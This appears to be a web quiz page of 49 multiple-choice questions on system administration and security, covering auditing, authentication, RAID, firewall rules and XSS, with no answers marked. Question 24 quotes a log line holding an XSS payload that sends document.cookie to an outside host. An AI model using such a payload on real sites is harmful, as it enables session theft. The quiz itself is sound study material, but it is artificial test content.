Can You Pass This System Administrator And Server Test?

49 Questions | Total Attempts: 310


A system administrator is a person who manages an organization's IT systems and is responsible for optimizing IT services, network servers and support systems. In large organizations, a system administrator also administers online data or cloud computing services to secure the network and prevent security breaches or hacking. This quiz has been developed to test your knowledge of system administration and servers. So, let's try out the quiz. All the best!


Questions and Answers
  • 1. 
    Ann, a new systems administrator, is enabling auditing of server file access successes and failures. She has configured the system policy to enable auditing for file access. However, when she reviews the event logs, she does not see any updates to the log files. Which of the following should be done to ensure capture of audit logs?
    • A. 

      Restart the audit service to enable the logs to be collected

    • B. 

      Enable the objects properties for auditing

    • C. 

      Set write permissions on the folders to be audited

    • D. 

      Configure an audit security group and assign the group to the share files

  • 2. 
    A company is concerned with multiple attacks on the ERP system and wants to configure a secondary ERP to mirror the first. The secondary ERP will contain padded information to monitor against attacks. Which of the following should the company deploy?
    • A. 

      Honeypot

    • B. 

       Bastion host

    • C. 

       IDS

    • D. 

      Sandbox

  • 3. 
    A company employs a firewall to protect its internal network. An internal router resides directly behind the firewall and is used to segment traffic to different subnets. Which of the following terms MOST accurately describes the use of multiple devices in layers to protect a network?
    • A. 

      Zoning

    • B. 

      Defense-in-depth

    • C. 

      Logical segmentation

    • D. 

      Network hardening

  • 4. 
    A security administrator wants to implement a solution to encrypt communications between the company’s servers and client workstations. The solution must account for protocols at layers 4 through 7 of the OSI model. Which of the following should be implemented?
    • A. 

      iSCSI

    • B. 

      SSH

    • C. 

      IPSec

    • D. 

      SCP

  • 5. 
    A company is installing a wireless network. The company anticipates that with future growth, it will require employees to use digital certificates. Additionally, the company expects to integrate Kerberos authentication within the next few years. Which of the following protocols BEST meets these requirements?
    • A. 

      CHAP

    • B. 

      EAP

    • C. 

      PAP

    • D. 

      MS-CHAP

  • 6. 
    The Chief Information Security Officer receives notification that a high-ranking employee is stealing corporate secrets for a competing organization. This employee is now considered
    • A. 

      A risk

    • B. 

      An exploit

    • C. 

      A threat

    • D. 

      A vulnerability

  • 7. 
    A public-facing web server is added to an existing network. This server must be isolated from the production network. The BEST way to add this server to the existing network design is to place the server
    • A. 

      In the same subnet as the other servers

    • B. 

      In the production VLAN

    • C. 

      In a DMZ

    • D. 

      In a separate VLAN

  • 8. 
    An accounting firm wants to increase the availability of its email services. Management has requested that the email servers be upgraded to ensure performance in the event of disk failures. The servers should be able to recover quickly from a single disk failure with little to no downtime. Which of the following options would BEST meet these requirements? (Select TWO)
    • A. 

      Use RAID 0 Arrays on the servers

    • B. 

      Use RAID 5 arrays on the servers

    • C. 

      Use RAID 10 arrays on the servers

    • D. 

      Use network-based backup tools to perform weekly full backups

    • E. 

      Use tape backups and restore to a warm site during a failover

    • F. 

      Use clustered replication of the email database for failover

  • 9. 
    An administrator places a server in “Permissive” mode to monitor security events before increasing system security. Which of the following tools is the administrator using?
    • A. 

      SELinux

    • B. 

      Containers

    • C. 

      Iptables

    • D. 

      Trusted Solaris

  • 10. 
    With MDM, which of the following is the BEST policy to implement in case of device theft?
    • A. 

      Choose devices without removable storage to prevent easy removal of data

    • B. 

      Ensure company devices are encrypted to prevent data seizure if an image is taken

    • C. 

      Disable certain features on the phone to prevent misuse of company device

    • D. 

      Have a remote wiping policy so if the device is stolen, the data is unrecoverable

  • 11. 
    A security administrator needs to improve upon the current authentication system. The improved authentication system must require a second authentication factor that must provide a new six-digit number only when a button is pressed on the device. Which of the following should be implemented?
    • A. 

      HSM

    • B. 

      TPM

    • C. 

      SMS OTP

    • D. 

      HOTP

    • E. 

      TOTP

  • 12. 
    A pool of corporate users consists of various global staff members who use different types of authentication services, such as Kerberos and one-time passwords. Due to the operational nature of the infrastructure, a standardized way of authenticating cannot be used, but authorization of users is still necessary. Which of the following should the company utilize to authorize the staff members?
    • A. 

      PAP

    • B. 

      CHAP

    • C. 

      SAML

    • D. 

      EAP

  • 13. 
    A recent audit has revealed a long-term employee has access to shares in several different departments that are not related to the employee’s current position. Which of the following would reduce the likelihood of this issue occurring again?
    • A. 

      Periodic user account audits

    • B. 

      User assigned privileges

    • C. 

      Continuous alert monitoring

    • D. 

      Biometric user authentication

  • 14. 
    A developer needs to store sensitive employee information on a back-end database. The sensitive database records must be accessed by a public web server in the DMZ. Which of the following should be implemented to secure the sensitive information stored in the database?
    • A. 

      Store the sensitive records using symmetric encryption

    • B. 

      Implement an ACL that prevents the web server from accessing the sensitive records

    • C. 

      Hash the sensitive records before storing them in the database

    • D. 

      Store the sensitive records using irreversible encryption

  • 15. 
    Which of the following uses signatures to ONLY detect network-based attacks?
    • A. 

      HIPS

    • B. 

      NAC

    • C. 

      WAF

    • D. 

      NIDS

  • 16. 
    A hospital uses legacy medical devices that are incompatible with OS upgrades. Which of the following should be used to secure these devices from unauthorized use by internal employees?
    • A. 

      Proxy server

    • B. 

      Network segmentation

    • C. 

      Intrusion prevention system

    • D. 

      Web application firewall

  • 17. 
    Joe, an instructor, routinely needs to run software created by students from a graduate-level programming course. He executes these programs on his office computer, which also has access to several university resources, including the database containing student grades. Joe is concerned because several of the students’ executables are oddly large and could potentially contain malicious payloads. A security administrator is helping Joe to prevent the students’ code from posing a security risk while maintaining his access to all university resources. Which of the following should the security administrator do to BEST fulfill the requirements?
    • A. 

      Implement an application whitelist on the workstation

    • B. 

      Install a HIDS

    • C. 

      Turn on DEP, SEHOP, and ASLR on the workstation’s OS

    • D. 

      Air gap the professor’s workstation

    • E. 

      Create a VM on the workstation

    • F. 

      Install antivirus and anti-malware software

  • 18. 
    A security technician is reviewing a new vendor’s practices for a project, but the vendor only supplied SLA documentation. Which of the following should the security technician request to understand the vendor’s adherence to its own policies?
    • A. 

      Controls data audits

    • B. 

      Entry log audits

    • C. 

      Access log audits

    • D. 

      Security log audits

  • 19. 
    When authenticating to a database, users are required to use ten-character passwords and change their passwords every 60 days. Which of the following should also be added to this password policy to mitigate the possibility of password compromise? (Select TWO)
    • A. 

      Password recovery

    • B. 

      Lockout period

    • C. 

      Increased complexity

    • D. 

      Limited reuse

    • E. 

      Account disablement

  • 20. 
    A systems administrator has received notification that an attacker has been attempting to spear phish the organization’s management team. The payload installs a specific executable, which then connects to an outside server and downloads additional instructions. By specifically blocking the executable involved in the attack with the organization’s HIPS platform, which of the following is the administrator performing?
    • A. 

      Whitelisting

    • B. 

      Patching

    • C. 

      Blacklisting

    • D. 

      Sandboxing

  • 21. 
    A company utilizes a mission-critical ERP supply chain solution. Over several years, development efforts and expansion of modules have been a priority to facilitate the increasing demand. Maintenance windows have been historically used to deploy new, updated code or a new module feature set. Over time the response of the ERP system has become slow and unstable, causing a delay in services the company provides to its customers. The security administrator begins investigating the issues and reviews the change management logs to attempt to correlate what may have caused the degradation. Which of the following would BEST stabilize and increase the performance of the ERP solution?
    • A. 

      Implement database failover to assist in managing session states

    • B. 

      Migrate the ERP environment to a mirrored storage solution

    • C. 

      Increase the memory on the database server

    • D. 

      Update the software to the current patch level

  • 22. 
    Which of the following should include a threat probability matrix?
    • A. 

      Incident response plan

    • B. 

      Backup plan

    • C. 

      Disaster recovery plan

    • D. 

      Business impact analysis

  • 23. 
    A recent security audit revealed several unauthorized devices were plugged into network jacks in unused cubicles. Which of the following could be used to help the security administrator reduce investigative overhead if this scenario occurs again?
    • A. 

      Rogue machine detection

    • B. 

      IDS

    • C. 

      Network firewall

    • D. 

      HIPS

  • 24. 
    A security administrator notices the following anomaly when reviewing the web proxy logs: http://intranet/page.asp?variable=”> document. Location=’http://www.darkweb.com/?’20 document.cookie. Which of the following vulnerabilities is being exploited?
    • A. 

      XSRF

    • B. 

      SQL injection

    • C. 

      XSS

    • D. 

      Session hijacking

  • 25. 
    A server administrator recently implemented file system ACLs on a web server. The webmaster now reports the following message: bash: vim: permission denied. Which of the following commands will assist in resolving the problem?
    • A. 

      Calcs

    • B. 

      ls -la

    • C. 

      setfacl

    • D. 

      getfacl

  • 26. 
    A CEO tells a security technician that he is concerned about preventive, detective, and corrective controls that they need to protect sensitive non-time critical information stored in the finance department. The finance department is located on the ground floor of a publicly accessible building and shares a common network with the sales department. Which of the following would be the MOST economical and would meet the CEO’s requirements?
    • A. 

      Install a firewall to segregate finance from the sales network, place alarm motion detectors on the ground floor and securely back up finance data

    • B. 

      Install a firewall to segregate finance from the sales network, place security guards in the ground floor foyer, and provision a cold site for data redundancy

    • C. 

      Install a HIDS on all the finance department’s PCs, place alarm motion detectors on the ground floor and provision a warm site for redundancy

    • D. 

      Install an IDS to detect malicious users, place security guards in the ground floor foyer and provision a hot site for data redundancy

  • 27. 
    Ann, an employee, is attempting to send a digitally signed email to Joe, a manager. After applying the proper settings to her email, Ann is unable to sign the email digitally. This is most likely happening because there is an issue with
    • A. 

      Ann’s public key

    • B. 

      Ann’s private key

    • C. 

      Joe’s private key

    • D. 

      Joe’s public key

  • 28. 
    A security specialist is trying to determine the software product and version of several HTTP and SMTP servers on the network. The specialist decides a quick banner grab should suffice. Which of the following protocols would be the MOST helpful in accomplishing this goal?
    • A. 

      SSH

    • B. 

      DNS

    • C. 

      Telnet

    • D. 

      SCP

    • E. 

      TFTP

  • 29. 
    During an assessment, an auditor observes employees holding the door for other personnel despite the presence of a swipe reader and an organizational policy that requires all personnel to swipe into secure areas. Which of the following did the auditor observe?
    • A. 

      Piggybacking

    • B. 

      Tailgating

    • C. 

      Impersonation

    • D. 

      Shoulder surfing

  • 30. 
    Joe, a technician, recently updated the intrusion detection signatures for new malware; however, this rule has generated an overwhelming number of IDS alerts. Investigation of these events has deemed them non-threatening. These IDS alerts are considered to be
    • A. 

      False positives

    • B. 

      False negatives

    • C. 

      Exploited anomaly

    • D. 

      Malicious logic

  • 31. 
    Which of the following are the BEST ways to prevent personally owned electronic devices from being connected to a corporate network? (Select TWO)
    • A. 

      Strong authentication with a hardware component

    • B. 

      MAC-based network authentication

    • C. 

      Annual technology refresh cycle

    • D. 

      Installing a guest network with WPA2

    • E. 

      Drafting a clear BYOD policy

    • F. 

      Disabling SSID broadcast and using RF shielding

  • 32. 
    While creating the requirements for an upcoming project, the data owner classifies the data as critical to the success of the project, publicly available, available 85% of the time and requiring full backups each day. Which of the following security goals is MOST important for this project?
    • A. 

      Confidentiality

    • B. 

      Integrity

    • C. 

      Availability

    • D. 

      Redundancy

  • 33. 
    A company is getting billed for excess network usage, even though its usage has not changed. The company’s wireless network has been slow. The number of hosts on the network exceeds the number of wireless devices the company owns. The company has WEP-encrypted access points cascading off a router. Which of the following would solve the issue? (Select TWO)
    • A. 

      Encrypt the wireless points using WPA2

    • B. 

      Disable SSID broadcast

    • C. 

      Use MAC filtering based on company devices

    • D. 

      Change the antenna placement

    • E. 

      Perform a site survey

  • 34. 
    An organization adopted a BYOD policy that allows employees to bring their personal laptops to work and only connect to the wireless network. The human resources department has received a complaint from a supervisor about an employee who spends too much time on non-work-related activities. The human resources department decides to submit a request to the IT security department to revoke the employee’s BYOD privileges. Which of the following is the BEST mitigation technique the IT security department should use to fulfill this request?
    • A. 

      Add the MAC addresses for the employee’s personal devices to a filter

    • B. 

      Add the IP addresses for the employee’s personal devices to a filter

    • C. 

      Revoke the Kerberos tickets assigned to the employee’s devices

    • D. 

      Revoke the WPA2 enterprise credentials assigned to the employee’s personal devices

  • 35. 
    After completing an audit, the auditor releases the following finding to the security team: Finding 3A: Use of weak cryptographic authentication with no SALT. Which of the following cryptographic algorithms cause this finding? (Select TWO)
    • A. 

      EAP

    • B. 

      LEAP

    • C. 

      MS-CHAPv2

    • D. 

      Blowfish

    • E. 

      Diffie-Hellman

  • 36. 
    A PKI user has been compromised and the user’s certificate has been revoked. Which of the following protocols will the web application use to ensure the certificate cannot be used?
    • A. 

      CRL

    • B. 

      OCSP

    • C. 

      Key escrow

    • D. 

      CA

  • 37. 
    An organization’s IT manager is implementing some new controls related to the secure management and configuration of network equipment within the production architecture. One of the controls requires log files to be stored away from the network perimeter and secured against unauthorized modification. Which of the following would BEST provide the capability required to address this control?
    • A. 

       File integrity monitor

    • B. 

      SIEM

    • C. 

      DMZ

    • D. 

      Local RAID drive

  • 38. 
    An administrator finds many employees are clicking on links in phishing emails. Which of the following should the administrator implement to protect workers who are tricked by these emails?
    • A. 

      URL filter

    • B. 

      Spam filter

    • C. 

      Protocol analyzer

    • D. 

      Web application firewall

  • 39. 
    Which of the following risk mitigation strategies could be implemented to ensure IT staff does not implement unapproved modifications to the company’s email system?
    • A. 

      Incident management

    • B. 

      Change management

    • C. 

      Data loss prevention

    • D. 

      Routine audits

  • 40. 
    A consulting firm has been hired to secure a new web application against XSS. Which of the following would be the BEST control to implement?
    • A. 

      Input validation

    • B. 

      Whitelisting

    • C. 

      Error and exception handling

    • D. 

      Access control list

  • 41. 
    A security engineer is asked to value performance while maintaining security on the company’s streaming media site. After some industry concerns arise with the way the company has implemented its RC4 algorithm, the security administrator decides to switch away from it in favor of a stronger algorithm. Which of the following should the security administrator utilize while still favoring performance?
    • A. 

      Blowfish in counter mode

    • B. 

      RIPEMD using electronic code book

    • C. 

      DES using cipher feedback

    • D. 

      3DES using Galois counter mode

  • 42. 
    During a disaster recovery testing procedure, a typically disabled service on the application server was started. Which of the following tools would BEST identify situations in which the service is not shut down?
    • A. 

      NIDS

    • B. 

      Baseline analyzer

    • C. 

      File integrity monitoring

    • D. 

      SIEM

  • 43. 
    Joe, a security administrator, has started using a centralized application whitelist in his organization. Joe wishes only to allow applications within a specific folder to execute. Additionally, Joe would like to allow all applications from a specific vendor. Which of the following controls should Joe implement? (Select TWO)
    • A. 

      Create “deny” rules for all applications with a specific file hash

    • B. 

      Create “deny” rules for all applications with a specified file path

    • C. 

      Create “allow” rules for applications signed with a specific digital signature

    • D. 

      Create “allow” rules for applications with a specific file extension

    • E. 

      Create “allow” rules for applications within a specified file path

    • F. 

      Create “deny” rules for applications signed with a specific digital signature

  • 44. 
    A development company intends to market its OS product toward high-security users. When designing the kernel’s security architecture, the development team begins to map out specific objects and determine which subjects will need to be able to access those objects. The team defines specific security domains that provide the context for this access control. Which of the following represents the access control objective the development team is trying to achieve?
    • A. 

      MAC

    • B. 

      Rule-based access control

    • C. 

      DAC

    • D. 

      Role-based access control

  • 45. 
    A consulting firm has been hired to secure a new web application against XSS. Which of the following would be the BEST control to implement?
    • A. 

      Input validation

    • B. 

      Whitelisting

    • C. 

      Error and exception handling

    • D. 

      Access control list

  • 46. 
    A Linux server hosts home directories for members of the marketing team. File system ACLs are in place in the home directories to allow for collaboration. Users report they are unable to view any files in a particular user’s home directory. Which of the following commands will allow the server administrator to view the file system ACLs in use on the /home/username directory?
    • A. 

      getfacl /home/username

    • B. 

      setfacl /home/username

    • C. 

      ls -lz /home/username

    • D. 

      getfacl -l /home

  • 47. 
    Some malware variants call back to command and control servers operated at URLs that are cryptographically generated according to the date of infection. The malware authors register the seemingly random URLs days in advance of the anticipated infections and call backs. Which of the following should a security engineer implement to prevent infections from reaching the command and control servers?
    • A. 

      Host-based IPS

    • B. 

      Signature-based IPS

    • C. 

      URL filtering

    • D. 

      Network-based content inspection

  • 48. 
    While reviewing access logs, a security administrator discovers the following output: Hostnames: zxp521, mic, Darwin: ip address: 64.213.8.1, 205.8.7.3 and 118.6.2.4: token serial s10a7f9, s10a7f9 and s10a7f9: time is 13:13, 14:01 and 14:35. Which of the following should the security administrator recommend to increase the security posture for authentication?
    • A. 

      Single sign-on access

    • B. 

      Smart card

    • C. 

      Access control

    • D. 

      Multifactor authentication

  • 49. 
    A security audit has determined the external firewall is improperly configured. Users must be able to access an RDP server and an HTTPS server remotely connected to a secured Linux terminal, and access incoming emails exclusively using SSL/TLS. All other incoming traffic should be disallowed. The current incoming firewall rules are as follows:

    Line  IP address      Port  Protocol  Action
    10    172.17.20.98    3389  TCP       allow
    20    172.17.10.50    110   TCP       ALLOW
    30    172.147.50.65   69    UDP       ALLOW
    40    172.17.30.28    23    TCP       ALLOW
    50    172.17.30.28    22    TCP       ALLOW
    60    172.17.10.51    443   TCP       ALLOW
    70    ANY             Any   ANY       Deny

    Which of the following firewall rule changes would meet the above criteria? (Select THREE)
    • A. 

      Remove line 10

    • B. 

      Remove line 30

    • C. 

      Change the protocol to TCP on line 30

    • D. 

      Remove line 40

    • E. 

      Change the port to 514 on line 50

    • F. 

      Change the port to 995 on line 20

    • G. 

      Change the port to 8080 on line 60